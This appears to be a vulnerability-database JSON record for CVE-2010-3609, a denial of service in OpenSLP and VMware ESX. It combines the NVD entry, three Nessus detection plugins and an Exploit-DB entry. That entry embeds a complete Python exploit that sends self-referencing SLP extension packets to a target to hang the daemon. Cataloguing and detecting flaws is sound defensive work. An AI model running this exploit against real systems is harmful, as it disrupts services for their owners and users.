{"cve": [{"lastseen": "2021-02-02T05:45:02", "description": "The extension parser in slp_v2message.c in OpenSLP 1.2.1, and other versions before SVN revision 1647, as used in Service Location Protocol daemon (SLPD) in VMware ESX 4.0 and 4.1 and ESXi 4.0 and 4.1, allows remote attackers to cause a denial of service (infinite loop) via a packet with a \"next extension offset\" that references this extension or a previous extension. NOTE: some of these details are obtained from third party information.", "edition": 4, "cvss3": {}, "published": "2011-03-11T17:55:00", "title": "CVE-2010-3609", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3609"], "modified": "2018-10-10T20:04:00", "cpe": ["cpe:/a:vmware:esxi:4.0", "cpe:/a:vmware:esx:4.1", "cpe:/a:vmware:esx:4.0", "cpe:/a:vmware:esxi:4.1", "cpe:/a:openslp:openslp:1.2.1"], "id": "CVE-2010-3609", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3609", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:openslp:openslp:1.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:esxi:4.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:esx:4.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:esx:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:esxi:4.0:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2016-02-02T08:12:53", "description": "OpenSLP 1.2.1 & < 1647 trunk - Denial of Service Exploit. CVE-2010-3609. 
Dos exploits for multiple platform", "published": "2011-08-05T00:00:00", "type": "exploitdb", "title": "OpenSLP 1.2.1 & < 1647 trunk - Denial of Service Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-3609"], "modified": "2011-08-05T00:00:00", "id": "EDB-ID:17610", "href": "https://www.exploit-db.com/exploits/17610/", "sourceData": "#!/usr/bin/python\r\n\r\n# Title: OpenSLP DoS\r\n# Author: Nicolas Gregoire (@Agarri_FR)\r\n# CVE: 2010-3609\r\n# Software download: http://www.openslp.org/download.html \r\n# Version: v1.2.1 and trunk before revision 1647\r\n# Tested on: Linux Ubuntu 10.04, VMware ESX 4.0\r\n# Notes: It affects some others SLP softwares, like mSLP. More details (in French) on my blog => http://goo.gl/s0zHq\r\n\r\n''' ==================================\r\n Pseudo documentation \r\n================================== '''\r\n\r\n# SLPick, extension DoS release\r\n# by Nicolas Gregoire\r\n\r\n''' ==================================\r\n Imports \r\n================================== '''\r\n\r\nimport getopt\r\nimport re\r\nimport sys\r\nimport binascii\r\nimport struct\r\nimport socket\r\nimport os\r\n\r\n\r\n''' ==================================\r\n Default values\r\n================================== '''\r\n\r\nversion = '0.4'\r\nmode = 'unicast'\r\nsource = 'N/A'\r\ntarget = 'N/A'\r\nxid = '\\x12\\x34'\r\nport = 427\r\nnb = 1\r\nreq = 'sr'\r\n\r\n''' ==================================\r\n Standard functions\r\n================================== '''\r\n\r\n# Some nice formatting\r\ndef zprint(str):\r\n\tprint '[=] ' + str\r\n\r\n# Function displaying CLI arguments\r\ndef showUsage():\r\n print 'Usage : ' + sys.argv[0] + ' [-h] [-m mode] [-p port] [-n number] [-s source_IP] [-t target_IP]'\r\n print '\\t[-h] Help (this text)'\r\n print '\\t[-m] Mode : tcp / unicast / broadcast / multicast (default is \"' + mode + '\")'\r\n print '\\t[-p] Port : default is \"' + str(port) + '\"'\r\n print '\\t[-s] Source IP Adress : no default (used only in 
multicast mode)'\r\n print '\\t[-t] Target IP Adress : no default (forced in multicast mode)'\r\n print '\\t[-n] Number of extensions : 0 (no bug) / 1 (default) / 2 (trailing extension)'\r\n print '\\t[-r] Request type : sr (ServerRequest, default) / ar (AttributeRequest)'\r\n sys.exit(1)\r\n\r\n# Function parsing parameters\r\ndef getArguments():\r\n try:\r\n optlist, list = getopt.getopt(sys.argv[1:], 'hm:p:t:s:n:r:')\r\n except getopt.GetoptError:\r\n showUsage()\r\n for opt in optlist:\r\n if opt[0] == '-h':\r\n showUsage()\r\n if opt[0] == '-p':\r\n global port\r\n port = opt[1]\r\n if opt[0] == '-s':\r\n global source\r\n source = opt[1]\r\n if opt[0] == '-t':\r\n global target\r\n target = opt[1]\r\n if opt[0] == '-m':\r\n global mode\r\n\t mode = opt[1]\r\n if opt[0] == '-n':\r\n global nb\r\n\t nb = int(opt[1])\r\n if opt[0] == '-r':\r\n global req\r\n\t req = opt[1]\r\n\r\n# Function checking parameters\r\ndef checkArguments():\r\n if (mode == 'multicast'):\r\n # XID : must be 0 in multicast mode\r\n # Target IP : default SLP multicast address\r\n # Source IP : address of the local interface \r\n global xid\r\n xid = '\\x00\\x00'\r\n\tzprint('Forcing XID to \"0\"')\r\n global target\r\n\ttarget = '239.255.255.253'\r\n\tzprint('Forcing target IP to \"' + target + '\"')\r\n if (source != 'N/A') :\r\n\t zprint('Forcing source IP to \"' + source + '\"')\r\n else:\r\n\t zprint('You need to force the source address with \"-s\" !')\r\n showUsage()\r\n elif (mode == 'unicast') or (mode == 'broadcast') or (mode == 'multicast') or (mode == 'tcp'):\r\n # Target IP : must be defined\r\n if (target == 'N/A') :\r\n zprint('Invalid target !')\r\n showUsage()\r\n else :\r\n zprint('Invalid mode !')\r\n showUsage()\r\n\r\n''' ==================================\r\n SLP functions\r\n================================== '''\r\n\r\n# Define payload of type \"Service Request\"\r\ndef getServRequest():\r\n\r\n\tzprint('Creating payload of type \"Service Request\"')\r\n\r\n\t# 
Function type\r\n\tf = '\\x01'\r\n\t# Empty fields\r\n\tprevious_list_length = '\\x00\\x00'\r\n\tpredicate_length = '\\x00\\x00'\r\n\tscope_length = '\\x00\\x00'\r\n\tspi_length = '\\x00\\x00'\r\n\t# Variable-size fields\r\n\tservice = 'service:directory-agent'\r\n\tservice_length = struct.pack('!h', len(service)) \r\n\t# Create message\r\n\tm = previous_list_length + service_length + service\r\n\tm += predicate_length + scope_length + spi_length\r\n\r\n\treturn(f, m)\r\n\r\n# Define payload of type \"Attribute Request\"\r\ndef getAttrRequest():\r\n\r\n\tzprint('Creating payload of type \"Attribue Request\"')\r\n\r\n\t# Function type\r\n\tf = '\\x06'\r\n\t# Empty fields\r\n\tprevious_list_length = '\\x00\\x00'\r\n\ttag_length = '\\x00\\x00'\r\n\tspi_length = '\\x00\\x00'\r\n\t# Variable-size fields\r\n\turl = 'http://www.agarri.fr/'\r\n\turl_length = struct.pack('!h', len(url)) \r\n\tscope = 'default'\r\n\tscope_length = struct.pack('!h', len(scope)) \r\n\t# Create message\r\n\tm = previous_list_length\r\n\tm += url_length + url + scope_length + scope\r\n\tm += tag_length + spi_length\r\n\r\n\treturn(f, m)\r\n\r\n# Define the function creating the full SLP packet\r\ndef createPacket(function, message):\r\n\r\n\tzprint('Adding headers and trailers')\r\n\r\n\t# SLP Version\r\n\tversion = '\\x02'\r\n # Set the 'Multicast required' flag to 1\r\n\tif (mode == 'broadcast' or mode == 'multicast'):\r\n\t flags = '\\x20\\x00'\r\n else:\r\n flags = '\\x00\\x00'\r\n\r\n #######################################################\r\n # Here's the bug !!!!\r\n #######################################################\r\n zprint('Using ' + str(nb) + ' extension(s)')\r\n if (nb == 0):\r\n # No extension == no bug\r\n\t next_ext_offset = '\\x00\\x00\\x00'\r\n\t extension = ''\r\n\telif (nb == 1):\r\n # Loop over itself\r\n\t next_ext_offset = '\\x00\\x00\\x05'\r\n\t extension = ''\r\n elif (nb == 2) :\r\n # Point to another extension located at the end of the packet\r\n # TODO : 
Calculate it at runtime\r\n\t if (req == 'sr'):\r\n next_ext_offset = '\\x00\\x00\\x31'\r\n else :\r\n next_ext_offset = '\\x00\\x00\\x36'\r\n # OpenSLP : extid should be < 0x4000 or > 0x7FFF \r\n\t ext_id = '\\xBA\\xBE'\r\n # Loop over itself, 0x05 (back to previous extension) should work too \r\n\t ext_nextoffset = next_ext_offset\r\n\t # Could be anything\r\n ext_data = '\\x22\\x22'\r\n\t # Create the trailing extension\r\n extension = ext_id + ext_nextoffset + ext_data\r\n else:\r\n\t print 'Wrong number of extensions'\r\n sys.exit(1)\r\n\r\n\t# Variable-size headers\r\n\tlang = 'en'\r\n\tlang_length = struct.pack('!h', len(lang)) \r\n\r\n\t# Assemble headers\r\n\theaders = flags + next_ext_offset + xid + lang_length + lang\r\n\r\n\t# Packet = version + function + overall size + headers + message + extension\r\n\tpacket = version + function + '\\x00'\r\n\tpacket += struct.pack('!h', len(headers + message + extension) + 5) \r\n\tpacket += headers + message + extension\r\n\r\n\treturn packet\r\n\r\n''' ==================================\r\n Send packet via TCP or UDP\r\n================================== '''\r\n\r\n# Send via TCP\r\ndef sendTcpPacket(packet):\r\n\r\n\tzprint('Sending packet via TCP [' + target + ']')\r\n\ts = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n\ts.settimeout(3)\r\n try:\r\n s.connect((target, port))\r\n except socket.error:\r\n zprint('Socket error (port closed ?)')\r\n sys.exit(1)\r\n\ts.send(packet)\r\n\ts.close\r\n\r\n# Send via unicast UDP\r\ndef sendUnicastPacket(packet):\r\n\r\n\tzprint('Sending packet via Unicast UDP [' + target + ']')\r\n\ts = socket.socket( socket.AF_INET, socket.SOCK_DGRAM )\r\n\ts.sendto( packet, (target, port) )\r\n\r\n# Send via broadcast UDP\r\ndef sendBroadcastPacket(packet):\r\n\r\n zprint('Sending packet via Broadcast UDP [' + target + ']')\r\n\ts = socket.socket( socket.AF_INET, socket.SOCK_DGRAM )\r\n s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)\r\n\ts.sendto( packet, (target, port) 
)\r\n\r\n# Send via multicast UDP\r\ndef sendMulticastPacket(packet):\r\n\r\n\tzprint('Sending packet via Multicast UDP [' + target + ']')\r\n\tsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)\r\n\tsock.bind((source, 6666)) # Select an interface (and an evil port ;-)\r\n\tsock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 255)\r\n\tsock.sendto(packet, (target, port) );\r\n\r\n''' ==================================\r\n Main code\r\n================================== '''\r\n\r\n# Print banner\r\nzprint('SLPick : SLP client v' + version + ' (by Nicolas Gregoire)')\r\n\r\n# Set options\r\ngetArguments()\r\ncheckArguments()\r\n\r\n# Which payload ?\r\nif (req == 'ar'):\r\n func, payload = getAttrRequest()\r\nelse :\r\n func, payload = getServRequest()\r\n\r\n# Add headers and trailers (including extensions)\r\npacket = createPacket(func, payload)\r\n\r\n# TCP\r\nif (mode == 'tcp'):\r\n\tsendTcpPacket(packet)\r\n# UDP\r\nelif (mode == 'unicast'):\r\n\tsendUnicastPacket(packet)\r\nelif (mode == 'broadcast'):\r\n\tsendBroadcastPacket(packet)\r\nelif (mode == 'multicast'):\r\n\tsendMulticastPacket(packet)\r\n\r\n# Exit\r\nzprint('Exit')\r\n\r\n\r\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/17610/"}], "nessus": [{"lastseen": "2021-01-07T11:54:07", "description": "Updated openslp packages fix security vulnerability :\n\nThe extension parser in slp_v2message.c in OpenSLP 1.2.1 allows remote\nattackers to cause a denial of service (infinite loop) via a packet\nwith a next extension offset that references this extension or a\nprevious extension (CVE-2010-3609).", "edition": 25, "published": "2013-04-20T00:00:00", "title": "Mandriva Linux Security Advisory : openslp (MDVSA-2013:111)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3609"], "modified": "2013-04-20T00:00:00", "cpe": ["cpe:/o:mandriva:business_server:1", 
"p-cpe:/a:mandriva:linux:openslp", "p-cpe:/a:mandriva:linux:lib64openslp1-devel", "p-cpe:/a:mandriva:linux:lib64openslp1"], "id": "MANDRIVA_MDVSA-2013-111.NASL", "href": "https://www.tenable.com/plugins/nessus/66123", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2013:111. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(66123);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2010-3609\");\n script_bugtraq_id(46772);\n script_xref(name:\"MDVSA\", value:\"2013:111\");\n script_xref(name:\"MGASA\", value:\"2012-0227\");\n\n script_name(english:\"Mandriva Linux Security Advisory : openslp (MDVSA-2013:111)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated openslp packages fix security vulnerability :\n\nThe extension parser in slp_v2message.c in OpenSLP 1.2.1 allows remote\nattackers to cause a denial of service (infinite loop) via a packet\nwith a next extension offset that references this extension or a\nprevious extension (CVE-2010-3609).\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected lib64openslp1, lib64openslp1-devel and / or\nopenslp packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", 
value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64openslp1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64openslp1-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:openslp\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/04/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/04/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lib64openslp1-1.2.1-12.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lib64openslp1-devel-1.2.1-12.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"openslp-1.2.1-12.1.mbs1\")) flag++;\n\n\nif (flag)\n{\n if 
(report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-07T11:53:50", "description": "A vulnerability has been discovered and corrected in openslp :\n\nThe extension parser in slp_v2message.c in OpenSLP 1.2.1 allows remote\nattackers to cause a denial of service (infinite loop) via a packet\nwith a next extension offset that references this extension or a\nprevious extension (CVE-2010-3609).\n\nThe updated packages have been patched to correct this issue.", "edition": 25, "published": "2012-09-06T00:00:00", "title": "Mandriva Linux Security Advisory : openslp (MDVSA-2012:141)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3609"], "modified": "2012-09-06T00:00:00", "cpe": ["cpe:/o:mandriva:linux:2011", "p-cpe:/a:mandriva:linux:openslp", "p-cpe:/a:mandriva:linux:lib64openslp1-devel", "p-cpe:/a:mandriva:linux:libopenslp1", "p-cpe:/a:mandriva:linux:libopenslp1-devel", "p-cpe:/a:mandriva:linux:lib64openslp1"], "id": "MANDRIVA_MDVSA-2012-141.NASL", "href": "https://www.tenable.com/plugins/nessus/61986", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2012:141. 
\n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(61986);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2010-3609\");\n script_bugtraq_id(46772);\n script_xref(name:\"MDVSA\", value:\"2012:141\");\n\n script_name(english:\"Mandriva Linux Security Advisory : openslp (MDVSA-2012:141)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A vulnerability has been discovered and corrected in openslp :\n\nThe extension parser in slp_v2message.c in OpenSLP 1.2.1 allows remote\nattackers to cause a denial of service (infinite loop) via a packet\nwith a next extension offset that references this extension or a\nprevious extension (CVE-2010-3609).\n\nThe updated packages have been patched to correct this issue.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64openslp1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64openslp1-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libopenslp1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libopenslp1-devel\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:openslp\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2011\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/08/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/09/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2011\", cpu:\"x86_64\", reference:\"lib64openslp1-1.2.1-12.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", cpu:\"x86_64\", reference:\"lib64openslp1-devel-1.2.1-12.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", cpu:\"i386\", reference:\"libopenslp1-1.2.1-12.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", cpu:\"i386\", reference:\"libopenslp1-devel-1.2.1-12.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"openslp-1.2.1-12.1-mdv2011.0\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if 
(report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-17T14:13:48", "description": "The openslp daemon could run into an endless loop when receiving\nspecially crafted packets (CVE-2010-3609). This has been fixed.\n\nAdditionally the following non-security bugs were fixed :\n\n - 564504: Fix handling of DA answers if both active and\n passive DA detection is off\n\n - 597215: Add configuration options to openSLP:\n net.slp.DASyncReg makes slpd query statically configured\n DAs for registrations, net.slp.isDABackup enables\n periodic writing of remote registrations to a backup\n file which is also read on startup. Both options can be\n used to decrease the time between the start of the slpd\n daemon and slpd knowing all registrations.\n\n - 601002: reduce CPU usage spikes on machines with many\n connections by using the kernel netlink interface\n instead of reading the /proc filesystem.\n\n - 626444: Standard compliance was fixed by stripping\n leading and trailing white spaces when doing string\n comparisons of scopes.", "edition": 23, "published": "2011-01-21T00:00:00", "title": "SuSE 11.1 Security Update : openSLP (SAT Patch Number 3312)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3609"], "modified": "2011-01-21T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:openslp-32bit", "p-cpe:/a:novell:suse_linux:11:openslp", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:11:openslp-server"], "id": "SUSE_11_OPENSLP-101012.NASL", "href": "https://www.tenable.com/plugins/nessus/51628", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. 
The text itself is\n# copyright (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(51628);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2010-3609\");\n\n script_name(english:\"SuSE 11.1 Security Update : openSLP (SAT Patch Number 3312)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The openslp daemon could run into an endless loop when receiving\nspecially crafted packets (CVE-2010-3609). This has been fixed.\n\nAdditionally the following non-security bugs were fixed :\n\n - 564504: Fix handling of DA answers if both active and\n passive DA detection is off\n\n - 597215: Add configuration options to openSLP:\n net.slp.DASyncReg makes slpd query statically configured\n DAs for registrations, net.slp.isDABackup enables\n periodic writing of remote registrations to a backup\n file which is also read on startup. 
Both options can be\n used to decrease the time between the start of the slpd\n daemon and slpd knowing all registrations.\n\n - 601002: reduce CPU usage spikes on machines with many\n connections by using the kernel netlink interface\n instead of reading the /proc filesystem.\n\n - 626444: Standard compliance was fixed by stripping\n leading and trailing white spaces when doing string\n comparisons of scopes.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=564504\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=597215\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=601002\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=626444\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=642571\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3609.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 3312.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:openslp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:openslp-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:openslp-server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/10/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/01/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n 
script_copyright(english:\"This script is Copyright (C) 2011-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(pl) || int(pl) != 1) audit(AUDIT_OS_NOT, \"SuSE 11.1\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"openslp-1.2.0-172.15.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"openslp-1.2.0-172.15.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"openslp-32bit-1.2.0-172.15.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"openslp-1.2.0-172.15.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"openslp-server-1.2.0-172.15.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"s390x\", reference:\"openslp-32bit-1.2.0-172.15.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"openslp-32bit-1.2.0-172.15.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 
